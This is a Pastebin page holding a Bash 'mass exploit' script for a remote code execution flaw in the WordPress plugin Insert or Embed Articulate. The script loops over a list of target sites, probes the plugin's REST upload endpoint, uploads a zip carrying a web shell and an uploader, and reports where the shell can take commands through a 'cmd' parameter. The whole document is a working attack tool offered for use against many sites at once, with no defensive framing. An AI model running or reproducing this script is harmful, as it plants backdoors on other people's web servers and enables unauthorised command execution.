Advertisement
Jemb0t_IR3eng

Mass Exploit WordPress Plugin Insert or Embed Articulate RCE

Jun 23rd, 2019
1,274
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 1.36 KB | None | 0 0
  1. #!/bin/bash
  2. # Author : Con7ext
  3. # Website: https://plantsec.blogspot.com/2019/06/wordpress-plugin-insert-or-embed.html
  4. # CXSECUR: https://cxsecurity.com/issue/WLB-2019060146
  5. # Just add parameter ?cmd={COMMAND} in /wp-content/uploads/articulate_uploads/kntl/index.php?cmd=ls
  6. green='\e[92m'
  7. blue='\e[34m'
  8. red='\e[31m'
  9. white='\e[39m'
  10. for site in `cat $1`;
  11. do
  12.   ck=$(curl -s --url "$site/index.php/wp-json/articulate/v1/upload-data")
  13.   if [[ $ck =~ "rest_no_route" ]];
  14.   then
  15.     printf "$green[+] $site -> Maybe Vuln\n"
  16.     mes=$(curl -s -F "name=kntl.zip" -F "chunk=2" -F "chunks=3" -F "[email protected]" --url "$site/index.php/wp-json/articulate/v1/upload-data")
  17.     if [[ $mes =~ "Upload Complete!" ]];
  18.     then
  19.       printf "$green[+] Success Uploading Shell ...\n"
  20.       printf "$blue[!] Checking Shell ...\n";
  21.       moe=$(curl -s --url "$site/wp-content/uploads/articulate_uploads/kntl/index.html")
  22.       if [[ $moe =~ "plantsec" ]];
  23.       then
  24.         printf "$green[+] Shell Found ... $site/wp-content/uploads/articulate_uploads/kntl/index.php\n"
  25.         printf "$green[+] Uploader ... $site/wp-content/uploads/articulate_uploads/kntl/upl.php\n\n"
  26.       else
  27.         printf "$red[-] Shell Not Found ...\n\n"
  28.       fi
  29.     else
  30.       printf "$red[-] Not Vuln ...\n\n"
  31.     fi
  32.   else
  33.     printf "$red[-] $site -> Not Vuln ...\n\n"
  34.   fi
  35. done
  36. printf "$white"
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement